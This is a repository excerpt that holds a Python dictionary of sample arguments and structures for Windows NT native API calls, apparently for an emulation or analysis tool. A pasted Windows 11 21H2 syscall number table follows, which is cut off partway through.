"structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ClientToken = None (no client token)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQuerySystemInformation": { "ntFunc": "NtQuerySystemInformation", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00001000" }, { "value": "0x00001000", "additionalComment": "SystemInformationLength (4096 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to buffer for SystemInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0020" }, { "value": "0x00000005", "additionalComment": "SystemInformationClass (SystemProcessInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetSystemInformation": { "ntFunc": "NtSetSystemInformation", "pushes": [ { "value": "0x00000010", "additionalComment": "SystemInformationLength (16 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to buffer for SystemInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0040" }, { "value": "0x00000011", "additionalComment": "SystemInformationClass (SystemTimeAdjustmentInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtGetTickCount": { "ntFunc": "NtGetTickCount", "pushes": [], "structures": {} }, "NtQueryPerformanceCounter": { "ntFunc": "NtQueryPerformanceCounter", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to LARGE_INTEGER PerformanceFrequency (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct260", "structureValueExpectations": "Frequency of the high-resolution performance counter.", "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to LARGE_INTEGER PerformanceCounter (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct261", "structureValueExpectations": "Current value of the high-resolution performance counter.", "pointedValue": None } ], "structures": { "struct260": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x989680", "fieldComment": "Performance frequency (1,000,000 Hz typical)" } ] }, "struct261": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x123456789ABCDEF0", "fieldComment": "Sample performance counter value" } ] } } }, "NtQuerySystemTime": { "ntFunc": "NtQuerySystemTime", "pushes": [ { "value": "0xbadd0070", "additionalComment": "Pointer to LARGE_INTEGER SystemTime (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct262", "structureValueExpectations": "Current system time as a 64-bit value (100-nanosecond intervals since Jan 1, 1601 UTC).", "pointedValue": None } ], "structures": { "struct262": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x01D9F1E2B3C4D5E6", "fieldComment": "Sample system time value" } ] } } }, "NtQueryTimerResolution": { "ntFunc": "NtQueryTimerResolution", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG CurrentResolution (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x000003E8" }, { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG MaximumResolution (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00002710" }, { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG MinimumResolution (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000064" } ], "structures": {} }, "NtSetSystemTime": { "ntFunc": "NtSetSystemTime", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to LARGE_INTEGER PreviousTime (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct263", "structureValueExpectations": "Previous system time value (optional, can be None).", "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to LARGE_INTEGER SystemTime (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct264", "structureValueExpectations": "New system time value to set.", "pointedValue": None } ], "structures": { "struct263": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000000000", "fieldComment": "Previous system time (None/unused in this example)" } ] }, "struct264": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x01D9A5B1C0000000", "fieldComment": "New system time (FILETIME format, e.g., 2024-06-01 00:00:00 UTC)" } ] } } }, "NtSetTimerResolution": { "ntFunc": "NtSetTimerResolution", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to ULONG CurrentResolution (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x000003E8" }, { "value": "0x00000001", "additionalComment": "BOOLEAN SetResolution (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x000003E8", "additionalComment": "ULONG DesiredResolution (1000, in 100-ns units)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlTimeFieldsToTime": { "ntFunc": "RtlTimeFieldsToTime", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Pointer to LARGE_INTEGER Time (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct265", "structureValueExpectations": "Receives the converted time value.", "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to TIME_FIELDS (dummy pointer)", "structurePointer": "TIME_FIELDS", "structureRef": "struct266", "structureValueExpectations": "Fields representing date and time.", "pointedValue": None } ], "structures": { "struct265": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000000000", "fieldComment": "Receives the converted time value" } ] }, "struct266": { "type": "TIME_FIELDS", "fields": [ { "fieldName": "Year", "fieldType": "USHORT", "fieldValue": "0x07E8", "fieldComment": "2024" }, { "fieldName": "Month", "fieldType": "USHORT", "fieldValue": "0x06", "fieldComment": "June" }, { "fieldName": "Day", "fieldType": "USHORT", "fieldValue": "0x01", "fieldComment": "1st" }, { "fieldName": "Hour", "fieldType": "USHORT", "fieldValue": "0x00", "fieldComment": "Midnight" }, { "fieldName": "Minute", "fieldType": "USHORT", "fieldValue": "0x00", "fieldComment": "00" }, { "fieldName": "Second", "fieldType": "USHORT", "fieldValue": "0x00", "fieldComment": "00" }, { "fieldName": "Milliseconds", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "0" }, { "fieldName": "Weekday", "fieldType": "USHORT", "fieldValue": "0x06", "fieldComment": "Saturday" } ] } } }, "RtlTimeToTimeFields": { "ntFunc": "RtlTimeToTimeFields", "pushes": [ { "value": "0xbadd0080", "additionalComment": "Pointer to TIME_FIELDS (dummy pointer)", "structurePointer": "TIME_FIELDS", "structureRef": "struct267", "structureValueExpectations": "Receives the broken-down time fields.", "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to LARGE_INTEGER Time (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct268", "structureValueExpectations": "Time value to convert.", "pointedValue": None } ], "structures": { "struct267": { "type": "TIME_FIELDS", "fields": [ { "fieldName": "Year", "fieldType": "USHORT", "fieldValue": "0x07E8", "fieldComment": "2024" }, { "fieldName": "Month", "fieldType": "USHORT", "fieldValue": "0x06", "fieldComment": "June" }, { "fieldName": "Day", "fieldType": "USHORT", "fieldValue": "0x01", "fieldComment": "1st" }, { "fieldName": "Hour", "fieldType": "USHORT", "fieldValue": "0x00", "fieldComment": "Midnight" }, { "fieldName": "Minute", "fieldType": "USHORT", "fieldValue": "0x00", "fieldComment": "00" }, { "fieldName": "Second", "fieldType": "USHORT", "fieldValue": "0x00", "fieldComment": "00" }, { "fieldName": "Milliseconds", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "0" }, { "fieldName": "Weekday", "fieldType": "USHORT", "fieldValue": "0x06", "fieldComment": "Saturday" } ] }, "struct268": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x01D9A5B1C0000000", "fieldComment": "Time value to convert (FILETIME format, e.g., 2024-06-01 00:00:00 UTC)" } ] } } }, "NtClose": { "ntFunc": "NtClose", "pushes": [ { "value": "0x00000444", "additionalComment": "HANDLE Handle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtFlushBuffersFileEx": { "ntFunc": "NtFlushBuffersFileEx", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000010", "additionalComment": "ULONG ParametersSize (16 bytes, typical for FSCTLs)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to Parameters buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xdeadbeef" }, { "value": "0x00000001", "additionalComment": "ULONG Flags (example: FLUSH_FLAGS_FILE_DATA_ONLY)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000888", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtOpenProcessTokenEx": { "ntFunc": "NtOpenProcessTokenEx", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to HANDLE TokenHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000040", "additionalComment": "ULONG HandleAttributes (OBJ_CASE_INSENSITIVE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x000F01FF", "additionalComment": "ACCESS_MASK DesiredAccess (TOKEN_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtOpenThreadTokenEx": { "ntFunc": "NtOpenThreadTokenEx", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to HANDLE TokenHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000040", "additionalComment": "ULONG HandleAttributes (OBJ_CASE_INSENSITIVE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN OpenAsSelf (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x000F01FF", "additionalComment": "ACCESS_MASK DesiredAccess (TOKEN_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00005555", "additionalComment": "HANDLE ThreadHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryDirectoryFileEx": { "ntFunc": "NtQueryDirectoryFileEx", "pushes": [ { "value": "0x00000000", "additionalComment": "PUNICODE_STRING FileName (None, query all entries)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG QueryFlags (SL_RESTART_SCAN)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000005", "additionalComment": "FILE_INFORMATION_CLASS FileInformationClass (FileDirectoryInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG Length (4096 bytes buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to FileInformation buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0050", "additionalComment": "Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "PVOID ApcContext (None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PIO_APC_ROUTINE ApcRoutine (None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE Event (None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000888", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryQuotaInformationFile": { "ntFunc": "NtQueryQuotaInformationFile", "pushes": [ { "value": "0x00000000", "additionalComment": "BOOLEAN RestartScan (FALSE, typical for initial call)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PSID StartSid (None, enumerate all SIDs)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG SidListLength (0, no SID list provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID SidList (None, no SID list provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "BOOLEAN ReturnSingleEntry (FALSE, return all entries)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG Length (4096 bytes, typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "PVOID Buffer (dummy pointer to output buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct269", "structureValueExpectations": "Status and information fields for I/O result.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle to open file)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct269": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS (initial value)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Number of bytes transferred (initial value)" } ] } } }, "NtSetQuotaInformationFile": { "ntFunc": "NtSetQuotaInformationFile", "pushes": [ { "value": "0x00000020", "additionalComment": "ULONG Length (32 bytes, typical quota info size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "PVOID Buffer (dummy pointer to quota info buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct270", "structureValueExpectations": "Status and information fields for I/O result.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle to open file)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct270": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS (initial value)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Number of bytes transferred (initial value)" } ] } } } } # print (syscallPossibleValues["NtAllocateVirtualMemory"]) ================================================ FILE: start/syscall_parser_toJson.py ================================================ win11_21H2="""SYSCALL ADDRESS FUNCTION 0x02 00007FFBF39E3F40 NtAcceptConnectPort 0x00 00007FFBF39E3F00 NtAccessCheck 0x29 00007FFBF39E4420 NtAccessCheckAndAuditAlarm 0x63 00007FFBF39E4B50 NtAccessCheckByType 0x59 00007FFBF39E4A20 NtAccessCheckByTypeAndAuditAlarm 0x64 00007FFBF39E4B70 NtAccessCheckByTypeResultList 0x65 00007FFBF39E4B90 NtAccessCheckByTypeResultListAndAuditAlarm 0x66 00007FFBF39E4BB0 NtAccessCheckByTypeResultListAndAuditAlarmByHandle 0x67 00007FFBF39E4BD0 NtAcquireCrossVmMutant 0x68 00007FFBF39E4BF0 NtAcquireProcessActivityReference 0x47 00007FFBF39E47E0 NtAddAtom 0x110069 00007FFBF39E4C10 NtAddAtomEx 0x6A 00007FFBF39E4C30 NtAddBootEntry 0x6B 00007FFBF39E4C50 NtAddDriverEntry 0x6C 00007FFBF39E4C70 NtAdjustGroupsToken 0x41 00007FFBF39E4720 NtAdjustPrivilegesToken 0x6D 00007FFBF39E4C90 NtAdjustTokenClaimsAndDeviceGroups 0x7006E 00007FFBF39E4CB0 NtAlertResumeThread 0x3006F 00007FFBF39E4CD0 NtAlertThread 0x40070 00007FFBF39E4CF0 NtAlertThreadByThreadId 0x40071 00007FFBF39E4D10 NtAllocateLocallyUniqueId 0x72 00007FFBF39E4D30 NtAllocateReserveObject 0x73 00007FFBF39E4D50 NtAllocateUserPhysicalPages 0x74 00007FFBF39E4D70 NtAllocateUserPhysicalPagesEx 0x110075 00007FFBF39E4D90 NtAllocateUuids 0x18 00007FFBF39E4200 NtAllocateVirtualMemory 0x76 00007FFBF39E4DB0 NtAllocateVirtualMemoryEx 0x77 00007FFBF39E4DD0 NtAlpcAcceptConnectPort 0x78 00007FFBF39E4DF0 NtAlpcCancelMessage 0x79 00007FFBF39E4E10 NtAlpcConnectPort 0x7A 00007FFBF39E4E30 NtAlpcConnectPortEx 0x7B 00007FFBF39E4E50 NtAlpcCreatePort 0x7C 00007FFBF39E4E70 NtAlpcCreatePortSection 0x7D 00007FFBF39E4E90 NtAlpcCreateResourceReserve 0x7E 00007FFBF39E4EB0 NtAlpcCreateSectionView 0x7F 00007FFBF39E4ED0 NtAlpcCreateSecurityContext 0x80 00007FFBF39E4EF0 NtAlpcDeletePortSection 0x81 00007FFBF39E4F10 NtAlpcDeleteResourceReserve 0x82 00007FFBF39E4F30 NtAlpcDeleteSectionView 0x83 00007FFBF39E4F50 NtAlpcDeleteSecurityContext 0x84 00007FFBF39E4F70 NtAlpcDisconnectPort 0x85 00007FFBF39E4F90 NtAlpcImpersonateClientContainerOfPort 0x86 00007FFBF39E4FB0 NtAlpcImpersonateClientOfPort 0x87 00007FFBF39E4FD0 NtAlpcOpenSenderProcess 0x88 00007FFBF39E4FF0 NtAlpcOpenSenderThread 0x89 00007FFBF39E5010 NtAlpcQueryInformation 0x8A 00007FFBF39E5030 NtAlpcQueryInformationMessage 0x8B 00007FFBF39E5050 NtAlpcRevokeSecurityContext 0x8C 00007FFBF39E5070 NtAlpcSendWaitReceivePort 0x8D 00007FFBF39E5090 NtAlpcSetInformation 0x4C 00007FFBF39E4880 NtApphelpCacheControl 0x5008E 00007FFBF39E50B0 NtAreMappedFilesTheSame 0x8008F 00007FFBF39E50D0 NtAssignProcessToJobObject 0x90 00007FFBF39E50F0 NtAssociateWaitCompletionPacket 0x91 00007FFBF39E5110 NtCallEnclave 0x05 00007FFBF39E3FA0 NtCallbackReturn 0x5D 00007FFBF39E4A90 NtCancelIoFile 0x92 00007FFBF39E5130 NtCancelIoFileEx 0x93 00007FFBF39E5150 NtCancelSynchronousIoFile 0x70061 00007FFBF39E4B10 NtCancelTimer 0x94 00007FFBF39E5170 NtCancelTimer2 0x95 00007FFBF39E5190 NtCancelWaitCompletionPacket 0x96 00007FFBF39E51B0 NtChangeProcessState 0x97 00007FFBF39E51D0 NtChangeThreadState 0x3003E 00007FFBF39E46C0 NtClearEvent 0x3003f 00007FFBF39E40E0 NtClose 0x3B 00007FFBF39E4660 NtCloseObjectAuditAlarm 0x98 00007FFBF39E51F0 NtCommitComplete 0x99 00007FFBF39E5210 NtCommitEnlistment 0x9A 00007FFBF39E5230 NtCommitRegistryTransaction 0x9B 00007FFBF39E5250 NtCommitTransaction 0x9C 00007FFBF39E5270 NtCompactKeys 0x9D 00007FFBF39E5290 NtCompareObjects 0x9E 00007FFBF39E52B0 NtCompareSigningLevels 0x9F 00007FFBF39E52D0 NtCompareTokens 0xA0 00007FFBF39E52F0 NtCompleteConnectPort 0x300A1 00007FFBF39E5310 NtCompressKey 0xA2 00007FFBF39E5330 NtConnectPort 0x43 00007FFBF39E4760 NtContinue 0xA3 00007FFBF39E5350 NtContinueEx 0xA4 00007FFBF39E5370 NtConvertBetweenAuxiliaryCounterAndPerformanceCounter 0xA5 00007FFBF39E5390 NtCreateCrossVmEvent 0xA6 00007FFBF39E53B0 NtCreateCrossVmMutant 0xA7 00007FFBF39E53D0 NtCreateDebugObject 0xA8 00007FFBF39E53F0 NtCreateDirectoryObject 0xA9 00007FFBF39E5410 NtCreateDirectoryObjectEx 0xAA 00007FFBF39E5430 NtCreateEnclave 0xAB 00007FFBF39E5450 NtCreateEnlistment 0x48 00007FFBF39E4800 NtCreateEvent 0xAC 00007FFBF39E5470 NtCreateEventPair 0x55 00007FFBF39E49A0 NtCreateFile 0xAD 00007FFBF39E5490 NtCreateIRTimer 0xAE 00007FFBF39E54B0 NtCreateIoCompletion 0xAF 00007FFBF39E54D0 NtCreateIoRing 0xB0 00007FFBF39E54F0 NtCreateJobObject 0xB1 00007FFBF39E5510 NtCreateJobSet 0x1D 00007FFBF39E42A0 NtCreateKey 0xB2 00007FFBF39E5530 NtCreateKeyTransacted 0xB3 00007FFBF39E5550 NtCreateKeyedEvent 0xB4 00007FFBF39E5570 NtCreateLowBoxToken 0xB5 00007FFBF39E5590 NtCreateMailslotFile 0xB6 00007FFBF39E55B0 NtCreateMutant 0xB7 00007FFBF39E55D0 NtCreateNamedPipeFile 0xB8 00007FFBF39E55F0 NtCreatePagingFile 0xB9 00007FFBF39E5610 NtCreatePartition 0xBA 00007FFBF39E5630 NtCreatePort 0xBB 00007FFBF39E5650 NtCreatePrivateNamespace 0xBC 00007FFBF39E5670 NtCreateProcess 0x4D 00007FFBF39E48A0 NtCreateProcessEx 0xBD 00007FFBF39E5690 NtCreateProcessStateChange 0xBE 00007FFBF39E56B0 NtCreateProfile 0xBF 00007FFBF39E56D0 NtCreateProfileEx 0xC0 00007FFBF39E56F0 NtCreateRegistryTransaction 0xC1 00007FFBF39E5710 NtCreateResourceManager 0x4A 00007FFBF39E4840 NtCreateSection 0xC2 00007FFBF39E5730 NtCreateSectionEx 0xC3 00007FFBF39E5750 NtCreateSemaphore 0xC4 00007FFBF39E5770 NtCreateSymbolicLinkObject 0x4E 00007FFBF39E48C0 NtCreateThread 0xC5 00007FFBF39E5790 NtCreateThreadEx 0xC6 00007FFBF39E57B0 NtCreateThreadStateChange 0xC7 00007FFBF39E57D0 NtCreateTimer 0xC8 00007FFBF39E57F0 NtCreateTimer2 0xC9 00007FFBF39E5810 NtCreateToken 0xCA 00007FFBF39E5830 NtCreateTokenEx 0xCB 00007FFBF39E5850 NtCreateTransaction 0xCC 00007FFBF39E5870 NtCreateTransactionManager 0xCD 00007FFBF39E5890 NtCreateUserProcess 0xCE 00007FFBF39E58B0 NtCreateWaitCompletionPacket 0xCF 00007FFBF39E58D0 NtCreateWaitablePort 0xD0 00007FFBF39E58F0 NtCreateWnfStateName 0xD1 00007FFBF39E5910 NtCreateWorkerFactory 0x800D2 00007FFBF39E5930 NtDebugActiveProcess 0xD3 00007FFBF39E5950 NtDebugContinue 0x60034 00007FFBF39E4580 NtDelayExecution 0x400D4 00007FFBF39E5970 NtDeleteAtom 0xD5 00007FFBF39E5990 NtDeleteBootEntry 0xD6 00007FFBF39E59B0 NtDeleteDriverEntry 0xD7 00007FFBF39E59D0 NtDeleteFile 0xD8 00007FFBF39E59F0 NtDeleteKey 0xD9 00007FFBF39E5A10 NtDeleteObjectAuditAlarm 0xDA 00007FFBF39E5A30 NtDeletePrivateNamespace 0xDB 00007FFBF39E5A50 NtDeleteValueKey 0xDC 00007FFBF39E5A70 NtDeleteWnfStateData 0xDD 00007FFBF39E5A90 NtDeleteWnfStateName 0x1B0007 00007FFBF39E3FE0 NtDeviceIoControlFile 0xDE 00007FFBF39E5AB0 NtDirectGraphicsCall 0xDF 00007FFBF39E5AD0 NtDisableLastKnownGood 0xE0 00007FFBF39E5AF0 NtDisplayString 0xE1 00007FFBF39E5B10 NtDrawText 0x3C 00007FFBF39E4680 NtDuplicateObject 0x42 00007FFBF39E4740 NtDuplicateToken 0xE2 00007FFBF39E5B30 NtEnableLastKnownGood 0xE3 00007FFBF39E5B50 NtEnumerateBootEntries 0xE4 00007FFBF39E5B70 NtEnumerateDriverEntries 0x32 00007FFBF39E4540 NtEnumerateKey 0xE5 00007FFBF39E5B90 NtEnumerateSystemEnvironmentValuesEx 0xE6 00007FFBF39E5BB0 NtEnumerateTransactionObject 0x13 00007FFBF39E4160 NtEnumerateValueKey 0xE7 00007FFBF39E5BD0 NtExtendSection 0xE8 00007FFBF39E5BF0 NtFilterBootOption 0xE9 00007FFBF39E5C10 NtFilterToken 0xEA 00007FFBF39E5C30 NtFilterTokenEx 0x0A0014 00007FFBF39E4180 NtFindAtom 0x4B 00007FFBF39E4860 NtFlushBuffersFile 0xEB 00007FFBF39E5C50 NtFlushBuffersFileEx 0xEC 00007FFBF39E5C70 NtFlushInstallUILanguage 0x0C00ED 00007FFBF39E5C90 NtFlushInstructionCache 0x300EE 00007FFBF39E5CB0 NtFlushKey 0xEF 00007FFBF39E5CD0 NtFlushProcessWriteBuffers 0xF0 00007FFBF39E5CF0 NtFlushVirtualMemory 0x100F1 00007FFBF39E5D10 NtFlushWriteBuffer 0xF2 00007FFBF39E5D30 NtFreeUserPhysicalPages 0x1E 00007FFBF39E42C0 NtFreeVirtualMemory 0xF3 00007FFBF39E5D50 NtFreezeRegistry 0xF4 00007FFBF39E5D70 NtFreezeTransactions 0x1B0039 00007FFBF39E4620 NtFsControlFile 0xF5 00007FFBF39E5D90 NtGetCachedSigningLevel 0xF6 00007FFBF39E5DB0 NtGetCompleteWnfStateSubscription 0xF7 00007FFBF39E5DD0 NtGetContextThread 0x1900F8 00007FFBF39E5DF0 NtGetCurrentProcessorNumber 0xF9 00007FFBF39E5E10 NtGetCurrentProcessorNumberEx 0x700FA 00007FFBF39E5E30 NtGetDevicePowerState 0xFB 00007FFBF39E5E50 NtGetMUIRegistryInfo 0xFC 00007FFBF39E5E70 NtGetNextProcess 0xFD 00007FFBF39E5E90 NtGetNextThread 0xFE 00007FFBF39E5EB0 NtGetNlsSectionPtr 0xFF 00007FFBF39E5ED0 NtGetNotificationResourceManager 0x100 00007FFBF39E5EF0 NtGetWriteWatch 0x30101 00007FFBF39E5F10 NtImpersonateAnonymousToken 0x7001F 00007FFBF39E42E0 NtImpersonateClientOfPort 0x102 00007FFBF39E5F30 NtImpersonateThread 0x103 00007FFBF39E5F50 NtInitializeEnclave 0x104 00007FFBF39E5F70 NtInitializeNlsFiles 0x105 00007FFBF39E5F90 NtInitializeRegistry 0x110106 00007FFBF39E5FB0 NtInitiatePowerAction 0x8004F 00007FFBF39E48E0 NtIsProcessInJob 0x10107 00007FFBF39E5FD0 NtIsSystemResumeAutomatic 0x108 00007FFBF39E5FF0 NtIsUILanguageComitted 0x109 00007FFBF39E6010 NtListenPort 0x10A 00007FFBF39E6030 NtLoadDriver 0x10B 00007FFBF39E6050 NtLoadEnclaveData 0x10C 00007FFBF39E6070 NtLoadKey 0x10D 00007FFBF39E6090 NtLoadKey2 0x10E 00007FFBF39E60B0 NtLoadKey3 0x10F 00007FFBF39E60D0 NtLoadKeyEx 0x110 00007FFBF39E60F0 NtLockFile 0x50111 00007FFBF39E6110 NtLockProductActivationKeys 0x30112 00007FFBF39E6130 NtLockRegistryKey 0x113 00007FFBF39E6150 NtLockVirtualMemory 0x30114 00007FFBF39E6170 NtMakePermanentObject 0x30115 00007FFBF39E6190 NtMakeTemporaryObject 0x116 00007FFBF39E61B0 NtManageHotPatch 0x117 00007FFBF39E61D0 NtManagePartition 0x118 00007FFBF39E61F0 NtMapCMFModule 0x0A0119 00007FFBF39E6210 NtMapUserPhysicalPages 0x0A0003 00007FFBF39E3F60 NtMapUserPhysicalPagesScatter 0x28 00007FFBF39E4400 NtMapViewOfSection 0x11A 00007FFBF39E6230 NtMapViewOfSectionEx 0x11B 00007FFBF39E6250 NtModifyBootEntry 0x11C 00007FFBF39E6270 NtModifyDriverEntry 0x11D 00007FFBF39E6290 NtNotifyChangeDirectoryFile 0x11E 00007FFBF39E62B0 NtNotifyChangeDirectoryFileEx 0x11F 00007FFBF39E62D0 NtNotifyChangeKey 0x120 00007FFBF39E62F0 NtNotifyChangeMultipleKeys 0x121 00007FFBF39E6310 NtNotifyChangeSession 0x58 00007FFBF39E4A00 NtOpenDirectoryObject 0x122 00007FFBF39E6330 NtOpenEnlistment 0x40 00007FFBF39E4700 NtOpenEvent 